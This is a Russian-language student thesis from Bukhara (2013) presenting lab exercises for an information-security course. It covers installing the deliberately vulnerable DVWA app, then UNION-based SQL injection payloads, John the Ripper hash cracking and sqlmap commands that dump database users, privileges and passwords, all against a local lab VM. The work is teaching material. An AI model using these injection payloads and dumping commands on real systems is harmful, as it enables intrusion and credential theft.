Создание электроннного пособия по предмету «Методы и средства защиты информации» для выполнения лабораторных работ по модулю «Хэш значения»

МИНИСТЕРСТВО ВЫСШЕГО И СРЕДНЕГО СПЕЦИАЛЬНОГО ОБРАЗОВАНИЯ РЕСПУБЛИКИ УЗБЕКИСТАН

БУХАРСКИЙ ИНЖЕНЕРНОТЕХНОЛОГИЧЕСКИЙ ИНСТИТУТ

Кафедра «Информатика и информационные технологии»

Направление 5140900- Профессиональное образование – (Информатика, информационные технологии)

ВЫПУСКНАЯ КВАЛИФИКАЦИОННАЯ РАБОТА

НА ТЕМУ

Создание электроннного пособия по предмету «Методы и средства защиты информации» для выполнения лабораторных работ по модулю «Хэш значения»

Выполнил: студент группы 11-09 МИИТ

CафаровМурод

Руководитель: ст.преп.Ибрагимов У.М.

Допускается к защите

«______» _________________2013г.

Заведующий кафедрой «ИИТ»:________

доц. Раззаков Ш.И.

Бухара- 2013 г.


Содержание

Введение………..……….......….……………………………………...1

1.Теоретическая часть..……….…………………………………….3

  1. Хеширование ............…………………………………….............3
    1. Хеш-функции, основанные на делении..........................................5
    2. Мультипликативная схема хеширования.......................................6
    3. Хеширование строк переменной длины ………………………...........7
    4. Идеальное хеширование ..............…………………………………….8
    5. Универсальное хеширование .......……………………………………9
    6. Криптографические хеш-функции…………………………………...11
    7. Контрольные суммы…………………………………………………...13
    8. Геометрическое хеширование………………………………………15

2.Основная часть................................................................................22

2.1. 1-часть. Установка DVWA ……...............................................19

2.2. 2-часть. SQL инъекция ……….......................................................43

2.3. 3-часть. Использование cookie...........................….........................64

2.4. ЛЕКЦИОННОЕ ЗАНЯТИЕ НА ТЕМУ “ХЭШ значения ” ПО ПРЕДМЕТУ “Методы и средство защиты информации” ………………………...…………….………………….…………….…..81

3.Безопасность жизнидеятельности...............................................88

3.1. Охрана труда ...................…………………..…...…......................88

3.2. Гражданская защита…………………..............................................90

3.3. Осуществление мероприятий по защите персонала объекта при

угрозе и возникновении ЧС...................................................................94

Xulosa..................................................................................................100

Foydalannilgan adabiyotlar..............................................................101

Ilova.....................................................................................................102


1-часть

1-секция. Настройка виртуалной машины Fedora14

1. Откройте Свой Проигрыватель VMware

Инструкция:

1.1На Вашей Главной ЭВМ Пойдите В

Start(Пуск) --> All Program (Все программы)--> VMWare --> VMWare Player

2. Отредактируйте Настройки Виртуальной машины BackTrack

Инструкция:

2.1 Выбирите Fedora 14

2.2 Щелкните по настройкам виртуальной машины Edit

3. Отредактируйте Сетевой адаптер

Инструкция:

3.1Выделите Сетевой адаптер

3.2 Выберите Соединенный мостом

3.3 Щелкните по Кнопке OK.

2-секция. Вход в систему к Fedora14

1. Запустите Fedora14 VM Экземпляр

Инструкции:

1.1 Запустите Проигрыватель VMWare

1.2 Выберите Fedora14

1.3 Запустите виртуальную машину

2. Вход в систему к Fedora14

Инструкции:

2.1 Вход в систему: студент

2.2 Пароль: <независимо от того, что Вы устанавливаете это в>.

3-секция. Открытый Операторский терминал и Получает IP-адрес

1. Запустите Терминальную Консоль

Инструкции:

1.1Applications --> Terminal

2.Переход в режим пользователя Root

Инструкции:

2.1Вводите команду su – root

2.2Вводите пароль пользователя Root

3.Получение IP адреса

Инструкции:

3.1Вводите комаеду ifconfig –a

Коментарии:

- Как обозначено ниже, мой IP-адрес 192.168.1.116.

-Пожалуйста, запишите свой IP-адрес.

4-секция. Установка Httpd Apache сервер

1.загрузите httpd

Инструкции:

1.1вводите команду: yum install httpd.i686

1.2вводите y и тем самим соглашситесь устоновлением

2.Выполнение Apache

Инструкции:

2.1 вводите команду:service httpd start

- Это запускает Apache, Слушая Демон.

2.2ps -eaf | grep httpd

- Проверьте, чтобы удостовериться, что Apache работает.

2.3chkconfig --level 2345 httpd on

- Создайте сценарий Запуска для уровней выполнения 2, 3, 4 и 5.

3.Настройка Firewall (сетевой экран)

Инструкции:

3.1Чтобы настроит сетевой экран перейдите по следующему адресу: System --> Administration --> Firewall

4.Настройка сетевого экрана

Инструкции:

4.1Нажмите кнопку Close

5.Аутентификация

Инструкции:

5.1вводите пароль пользователя root

5.2нажмите кнопку Authenticate

6.Включение WWW

Инструкции:

6.1поставьте галочку в WWW из списка

6.2нажмите кнопку Apply

7.Записать настройки

Инструкции:

7.1нажмите кнопку Yes

5 – секция. Установка Mysql и mysql-server

1. установка mysql

Инструкции:

  1. Для установления mysql вводите команду: yum install mysql.i686
    1. Переходите к следующему шагу

2.установка Mysql

Инструкции:

2.1 вводите y и разрешите установку

3. установка mysql-server

Инструкции:

3.1 для установки mysql-server вводите команду: yum install

3.2 вводите y и разрешите установку

4. выполнение службы mysqld

Инструкции:

4.1 вводите команду: service mysqld start и тем самим запустите службу mysqld

5. запуск mysqld

Инструкции:

5.1 chkconfig --level 2345 mysqld on

- Создает сценарии запуска для уровня выполнения 2, 3, 4 и 5.

5.2 mysqladmin -u root password dvwaPASSWORD

- Устанавливает пароль ползователя root для mysql в "dvwaPASSWORD"

6. Вход в систему к mysql и создает dvwa базу данных

Инструкции:

6.1 mysql -uroot -p

-это команда входит mysql

6.2 dvwaPASSWORD

-ввод пароля root

6.3 create database dvwa;

-это команда создает базу данных dvwa

6.4 quit

-выход из mysql

6-секция. Установка PHP

1.установка PHP

Инструкции:

1.1для загрузки php вводите команду: yum install php.i686

1.2водите y и разрешите загрузку

2.установка php-mysql

Инструкции:

2.1для установки php-mysql вводите команду:yum install php-mysql

2.2водите y и разрешите установку

3.установка php-pear

Инструкции:

3.1для установки php-pear вводите команду: yum install php-pear php-pear-DB

3.2водите y и разрешите установку

7-секция. Установка Wget

1.установка wget

Инструкции:

1.1для установки wget вводите команду: yum install wget

1.2водите y и разрешите установку wget

8-секция. Установка Damn Vulnerable Web App (DVWA)

1.Загрузка DVWA

Инструкция:

1.1водите команду: cd /var/www/html и перейдите по этому адресу

1.2для загрузки DVWA вводите команду: wget http://dvwa.googlecode.com/files/DVWA-1.0.7.zip

-по этому адресу может быть новая версия программы

1.3ls -l | grep DVWA

-команда для проверки удачной загрузки DVWA-1.0.7.zip

2.Распаковка пакета

Инструкции:

2.1для разархивирования вводите команду: unzip DVWA-1.0.7.zip

3.Извличение Zip файла

Инструкции:

3.1 для просмотра архив файла вводите команду: ls –lrta

3.2для удаления архив файла вводите команду: rm DVWA-1.0.7.zip

3.3водите y и разрешите удаление архива

4.настройка файла config.inc.php

Инструкции:

4.1cd /var/www/html/dvwa/config

-с помощью этой команды переходим к папке dvwa

4.2cp config.inc.php config.inc.php.BKP

- с помощью этой команды копируем файл настройки

4.3chmod 000 config.inc.php.BKP

- с помощью этой команды удаляем разрешение к этому файлу

4.4vi config.inc.php

- с помощью этой команды мы открываем файл config.inc.php для редактирования в редакторе vi

5.настройка файла config.inc.php

Инструкции:

5.1 Стрелка вниз к строке, которая содержит db_password

5.2нажмите клавишу “i”

- Это помещает редактор vi в РЕЖИМ ВСТАВКИ.

5.3 вводите пароль "dvwaPASSWORD"

5.4нажмите в клавиатуре кнопку <Esc>

- Это вынимает редактор vi из РЕЖИМА ВСТАВКИ.

5.5вводите в клавиатуре ":wq!"

-это команда сохраняет изминения в файле config.inc.php

6.Перезапуск Apachini

Инструкции:

6.1команда service httpd restart перезапускает Apache

6.2ps -eaf | grep -v grep | grep httpd

-это команда проверит работаетли Apache

7.Запуск веб броузера Web Browse

Инструкции:

7.1 По этому адресу запускаем веб броузер Firefox: Applications --> Internet --> Firefox
Комментарии:Из этого адреса в любой операционной системе можно запустит веб броузера

8.Установка базы данных DVWA

Инструкции:

8.1http://192.168.1.116/dvwa/setup.php

- Замените 192.168.1.116 IP-адресом, полученным из Раздела 3, Шаг 3.

8.2нажмите кнопку Create / Reset Database

9. Сообщения Создания DVWA

Инструкции:

9.1 Следует видеть ниже создаваемой базы данных, данные, вставленные, и установить успешные сообщения.

9.2нажмите кнопку Logout

10.вход в DVWA

Инструкции:

10.1Username: admin

-вводите в поле Username:admin

10.2Password: password

-вводите в поле Password:password

11.Добро пожаловать в DVWA

Инструкции:

11.1Вы можете удовлетворится в удачной установке и входе в DVWA по следующему рисунку


2-часть

Для выполнение 2 части вы должны пройти секции 1-3 части №1

4-секция. Выключение состояния SELINUX

1.Запустите Terminal Consol

Инструкции:

1.1Sestatus

1.2Если после команды 1.1 значение SeLinux status равно disable или значение Current mode равно permissive то отпустите следующие команды и переходите к следующей секции.

1.3Если после команды 1.1 значение SeLinux status равно enable и значение Current mode равно enforcing то выполните следующие операции

Комментарии: в нашем случае мы должны перевести статус selinux разрешаюший режим для показа аттак DVWA

2.Запустите Terminal Consol

Инструкции:

2.1echo 0 > /selinux/enforce

-это команда в файле enforce размешает значение “0” и тем самим переводить режим selinux в значение permissive

2.2sestatus

-это команда показывает что selinux перешел в режим permissive

5-секция. Настройка виртуалной машины BackTrack

1.Откройте ваш VMware

Инструкции:

1.1В основном компьютере перейдите по следующему адресу

1.2Start(Пуск) --> All Program (Все программы)--> VMWare --> VMWare Player

2.Редактирование настроек виртуалной машины BackTrack

Инструкции:

2.1выделите BackTrack5R1

  1. Нажимая кнопку Edit мы переходим редактирование настроек виртуалной машины

3.Настройка сетевого адаптера

Инструкции:

3.1Выберите пункт сетовой адаптер

3.2Выберите подключение типа мост

3.3Нажмите кнопку OK

8-секция. Запуск BackTrack

1.Запустите в виртуалной машине BackTrack

Инструкции:

1.1Запустите виртуалную машину

1.2Выберите BackTrack5R1

1.3Нажмите кнопку Play в виртуалной машине

2.Вход в BackTrack

Инструкции:

2.1Login: root (В поле Login вводите: root)

2.2Парол: toor или <пароль которое вы поменяли>

-в поле Password вводите:toor или парол пользователя root которое вы поменяли

3.Переход в режим GNOME

Инструкции:

3.1вводите команду:startx

9-секция. Открыт консоль терминала и определение IP адреса

1.Открыт консоль терминала

Инструкции:

1.1Нажмите на кнопку console terminal который находится на верху экрана

2.Получение IP адреса

Инструкции:

2.1ifconfig –a

Комментарии:

-как показано ниже наш IPадрес 192.168.1.105

-пожалуйста запишите ваш IP адрес

10-секция. Вход в DVWA

1.вход в DVWA

Инструкции:

1.1В BackTrack запустите Firefox

2.2В адресной строке вводите: http://192.168.1.106/dvwa/login.php

-192.168.1.106 это IP адрес компьютера Fedora системой

2.3В поле Login вводите “admin”

2.4В поле Password вводите “password”

2.5Нажмите кнопку Login


11-секция.Установка уровня безопасности

1.установка уровня безопасности в DVWA

Инструкции:

1.1Нажмите кнопку DVWA Security.

2.Установка уровня безопасности веб программы

Инструкции:

2.1выберите уровень “Low”

2.2Нажмите кнопку Submit

12-секция. SQL инъекцияга кириш

1.SQL инъекция менюси

Инструкция:

1.1Слева меню выберите пункт SQL Injection

2.Общая инъекция

Инструкции:

2.1В текстовом поле вводите «1»

2.2Нажмите кнопку Submit

2.3 Веб-страница/код, как предполагается, печатает ID, Имя, и Фамилию на экран.

Комментарии:

- Ниже оператор выбора PHP, который мы будем использовать, специально $id(пример: $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";)

3.Всегда правилный сценарий

Инструкции:

3.1 Введите следующий текст в Текстовое поле Идентификатора пользователя (См. Изображение).

- %' or '0'='0

3.2Нажмите кнопку Submit

Комментарии:

- В этом сценарии мы говорим показать в дисплее вся запись, которые являются ложью и всеми записями, которые являются истиной.

- %' - вероятно, не будет равно чему-либо, и будет ложь.

- '0' = '0' - равно истине, потому что 0 будет всегда приравнивать 0.

- Оператор базы данных

- mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';

4. Версия Базы данных

Инструкции:

4.1. Введите следующий текст в Текстовое поле Идентификатора пользователя (См. Изображение).

- %' or 0=0 union select null, version() #

4.2 Щелкните по Submit

Комментарии:

- Заметьте в последней выведенной на экран строке, 5.1.60 выводится на экран в фамилии.

- Это - версия mysql базы данных.

5.Пользователи Базы данных

Инструкции:

5.1 Введите следующий текст в Текстовое поле Идентификатора пользователя (См. Изображение).

- %' or 0=0 union select null, user() #

5.2 Нажмите кнопку Submit

Комментарии:

- Заметьте в последней выведенной на экран строке, root@localhost выводится на экран в фамилии.

-Это - имя пользователя базы данных, который выполнился за кулисами код PHP.

6. Выведите на экран Имя базы данных

Инструкции:

6.1 Введите следующий текст в Текстовое поле Идентификатора пользователя (См. Изображение).

- %' or 0=0 union select null, database() #

6.2 Нажмите кнопку Submit

Комментарии:

- Заметьте в последней выведенной на экран строке, dvwa выводится на экран в фамилии.

-Это - имя базы данных.

7. Выведите на экран все таблицы в information_schema

Инструкции:

7.1Введите ниже текста в Текстовое поле Идентификатора пользователя (См. Изображение).

- %' and 1=0 union select null, table_name from information_schema.tables #

7.2 Нажмите кнопку Submit

Комментарии:

-Теперь мы выводим на экран все таблицы в information_schema базе данных.

-INFORMATION_SCHEMA - информационная база данных, помещение, которое хранит информацию обо всех других базах данных, которые поддерживает MySQL.

8. Выведите на экран все пользовательские таблицы в information_schema

Инструкции:

8.1Введите следуюший текст в Текстовое поле Идентификатора пользователя (См. Изображение).

-%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#

8.2Щелкните по Submit

Комментарии:

-Теперь мы выводим на экран все таблицы, которые запускают с префикса "users" в information_schema базе данных.

9. Выведите на экран все поля столбцов в information_schema пользовательской таблице

Инструкции:

9.1Введите следующий текст в Текстовое поле Идентификатора пользователя (См. Изображение).

-%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #

9.2Щелкните по Submit

Комментарии:

-Теперь мы выводим на экран все столбцы в таблице потребителей.

-Уведомление там - user_id, first_name, last_name,user и столбец Password.

10. Выведите на экран все полевое содержание столбцов в information_schema пользовательской таблице

Инструкции:

10.1Введите следующий текст в Текстовое поле Идентификатора пользователя (См. Изображение).

-%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

10.2Щелкните по Submit

Комментарии:

-Теперь мы успешно вывели на экран всю необходимую информацию об аутентификации в эту базу данных.

13-секция. Создайте Файл Хэша пароля

1. Создайте Файл Хэша пароля

Инструкции:

1.1Выделение всех пользователей и хэш паролей

1.2Нажмите правую кнопку мышке

1.3Копируйте

2.Открыт блокнот

Инструкции:

2.1Applications --> Wine --> Programs --> Accessories --> Notepad

3.Вставить в блокнот

Инструкции:

3.1Edit --> Paste

4. Формат в блокноте

Инструкции:

4.1Поместите ":" сразу после слова admin

4.2Удостоверьтесь, что Ваш курсор сразу после ":" и нажмите клавишу Delete.

4.3Теперь следует видеть пользователя admin и хэш пароля, разделенный ":" на той же самой строке.

4.4Копируйте сочетания имени пользователей и паролей для gordonb, 1337, pablo, и smitty от (секция 13, Шаг 1) и вклейте этот же файл.

5.Сохранение файла из блокнота

Инструкции:

5.1Переходите в адрес /pentest/passwords/john

5.2Поставьте имя файла dvwa_password.txt

5.3Нажмите кнопку Save

14-секция. Использование утилиты John Ripper

1.Утилита John Ripper

Инструкции:

1.1Откройте новый терминал

1.2 cd /pentest/passwords/john

1.3 ./john --format=raw-MD5 dvwa_password.txt

-после несколькой времени мы можем посмотреть откритые пароли пользователей расщиврованние ХЭШ функцией(длительность можем быть долгим если пароль очень длинный)


3-часть

Для выполнение 3 части вы должны пройти секции 1-3 части №1 и секции 4-10 части №2

11-секция. Получите Cookie PHP

1.SQL инъекция менюси

Инструкции:

1.1Слева меню выберите "SQL Injection"

2. Выбрать Tamper Data

Инструкции:

2.1 Tools --> Tamper Data

3. Запустит Tamper Data

Инструкции:

3.1Нажмите на Start Tamper

4.Общая инъекция

Инструкции:

4.1вводите в текствое поле «1»

4.2 Нажмите кнопку Submit

Комментарии:

- Цель здесь, см., что ПОЛУЧИТЬ запрос сделан к программе CGI за кулисами.

- Кроме того, мы будем использовать вывод "Фамилии" с SQLMAP, чтобы получить содержание имени пользователя и пароля базы данных.

5. Tamper с запросом?

Инструкции:

5.1Удостоверьтесь Продолжение Вмешивающегося? отмечаемое поле должно быть неотмеченным

5.2Нажмите кнопку Submit

6. Копирование Referer URL

Инструкции:

6.1Выделите 2 строку с параметром GET

6.2Нажмите правую кнопку в поле Referer

6.3 Выберите Copy

7.Открыт блокнот

Инструкции:

7.1Applications --> Wine --> Programs --> Accessories --> Notepad

8. Вставить Referer URL в блокноте

Инструкции:

8.1Edit --> Paste

9.Копирование Cookie информации

Инструкции:

9.1Нажмите правую кнопку в строке Cookie

9.2 Выберите Copy

10.Вставка Cookie информацию

Инструкции:

10.1Edit --> Paste

Комментарии:

-Теперь следует скопировать и строки Referer и Cookie в Блокнот. (См. Изображение),

12-секция. Используя SqlMap, чтобы Получить Текущего пользователя и Базу данных

1. Проверьте, что sqlmap.py существует

Инструкции:

1.1cd /pentest/database/sqlmap

1.2ls -l sqlmap.py

2. Получите пользователя Базы данных Для DVWA

Комментарии:

-Получите ссылку referer из (секции 10, Шаг 10), который помещается после флага "-u" ниже.

-Получите строку cookie из (секции 10, Шаг 10), который помещается после "-cookie" флаг ниже.

Инструкции:

2.1./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" -- cookie = "PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b --current-db --current-user

-u, Target URL

- cookie, главный Cookie http

-b, Получите баннер DBMS

--current-db, Получите текущую базу данных DBMS

--current-user, Получите текущего пользователя DBMS

3. Вы хотите продолжить тестировать?

Инструкции:

3.1продолжите тестировать? y

3.2пропустите payloads? Y

4.Смотреть результаты

Инструкции:

4.1Для веб-приложения DVWA имя базы данных - "dvwa" и программы, которые связываются с базой данных, "root@localhost";

13-секция. Используя SqlMap, чтобы Получить Имя пользователя управления базой данных и Пароль

Комментарии:

-Вы, должно были завершить Урок 4, чтобы видеть db_hacker в секции 2.

1. Получите Имя пользователя управления базой данных и Пароль

Инструкции:

1.1 ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie = "PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --string="Surname" --users --password

-u, Target URL

--cookie, главный Cookie HTTP

-string, Обеспечивают строковый набор, который всегда присутствует после допустимого или недопустимого запроса.

--users, список пользователей системы управления базами данных

--password, список паролей управления базой данных для системных пользователей.

2. Получите Имя пользователя управления базой данных и Пароль (Часть 2)

Инструкции:

2.1Используйте Атаку с подбором по словарю? y

2.2Расположение словаря? <Нажатие Enter>

Комментарии:

-Заметьте, что пароль для имени пользователя db_hacker был взломан.

3. Получите db_hacker Полномочия Базы данных

Инструкции:

3.1./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie = "PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -U db_hacker --privileges

-u, Target URL

--cookie, главный Cookie HTTP

-U, Укажите пользователя управления базой данных

--privileges, список полномочия пользователей системы управления базами данных

4. Результаты представления: Получите db_hacker Полномочия Базы данных

Инструкции:

4.1Заметьте, что у потребителя DBMS "db_hacker" есть административные привилегии

4.2Заметьте, что "db_hacker" может войти в систему отовсюду через подстановочную действующую компанию "%".

14-секция. Получите "dvwa" таблицы и содержание

1. Получите "dvwa" таблицы и содержание

Примечание:

-Получите ссылку referer из (секции10, Шаг 10), который помещается после флага "-u" ниже.

-Получите строку cookie из (секции 10, Шаг 10), который помещается после "--cookie" флаг ниже.

Инструкции:

1.1./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie = "PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -- tables

-u, Target URL

--cookie, главный Cookie HTTP

-D, Укажите Базу данных

-- tables, список таблиц базы данных

2. Просмотр "dvwa" таблицы и результаты контента

Примечание:

-Заметьте sqlmap, перечисленный две таблицы: guestbook и users.

3. Получите столбцы для таблицы dvwa.users

Инструкции:

3.1./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie = "PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low"-D dvwa users --columns

-u, Target URL

--cookie, главный Cookie HTTP

-D, Укажите Базу данных

-T, Укажите Таблицу базы данных

--columns, Перечислите Столбцы Таблицы базы данных.

4. Просмотр Результатов: столбцы для таблицы dvwa.users

Примечание:

-Заметьте, что есть и пользователь и столбцы пароля в dvwa.users таблице.

5. Получите пользователей и их пароли от таблицы dvwa.users (Часть 1)

Инструкции:

5.1./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie = "PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low"-D dvwa -T users -C user,password --dump

-u, Target URL

--cookie, главный Cookie HTTP

-D, Укажите Базу данных

-C, Список стобцов пользователей и паролей

--dump, табличное содержание Дампа

6. Получите пользователей и их пароли от таблицы dvwa.users (Часть 2)

Инструкции:

6.1Вы хотите использовать оператор LIKE? y

6.2Распознайте возможные значения хэш? y

6.3Каково расположение словаря? <Нажатие Enter>

6.4Используйте общие суффиксы пароля? y

7. Результаты анализа: Пользователи и их Пароли от таблицы dvwa.users

Комментарии:

-Заметьте, как sqlmap приятно выводит на экран пароли для каждого пользователя.


СПИСОК ИСПОЛЬЗОВАННЫХ ЛИТЕРАТУР:

  1. Шаньгин В Ф. Защита компьютерной информации. Эффективные методы и средства, EAN: 9785940745181, Дмк пресс, 2010.
  2. Гашков С.Б. Криптографические методы защиты информации, EAN: 9785769549625, Академия, 2010.
  3. Dieter Gollman, Computer Security, WILEY, 2011, ISBN: 978-0-470-74115
  4. Michael T. Goodrich and Roberto Tamassia, Introduction to Computer Security, PEARSON Education, 2011, ISBN: 0-321-70201-8.
  5. Steve Furnell, Sokratis Katsikas, Javier Lopez and Ahmed Patel ed., Securing Information and Communication Systems: Principles, Technologies, and Applications, Artech House, 2008, ISBN:978-1-59693-228-9.
  6. Charles P. Pfleeger and Shari Lawrence Pfleeger, Security in Computing, Prentice Hall, 2007, ISBN:9780132390774.
  7. Niels Ferguson, Bruce Schneier, and Tadayoshi Kohno, Cryptography Engineering, John Wiley & Sons, 2010, ISBN: 9780470474242
  8. Alessandro Acquisti, Stefanos Gritzalis, Costas Lambrinoudakis and Sabrina De Capitani di Vimercati ed., Digital Privacy: Theory, Technologies, and Practice, Auerbach Publications, 2008, ISBN: 978-1-4200-5217-6
  9. Keith Jones, Richard Bejtlich and Curtis Rose, Real Digital Forensics: Computer Security and Incident Response, Addison-Wesley, 2005, ISBN13: 9780321240699
  10. Brian Carrier, File System Forensic Analysis, Addison-Wesley, 2005, ISBN13: 9780321268174
  11. Cormen, Leiserson, and Rivest: Introduction to Algorithms
  12. www.inuit.ru
  13. www.computerstudentsecurity.com
  14. www.kau.se

Создание электроннного пособия по предмету «Методы и средства защиты информации» для выполнения лабораторных работ по модулю «Хэш значения»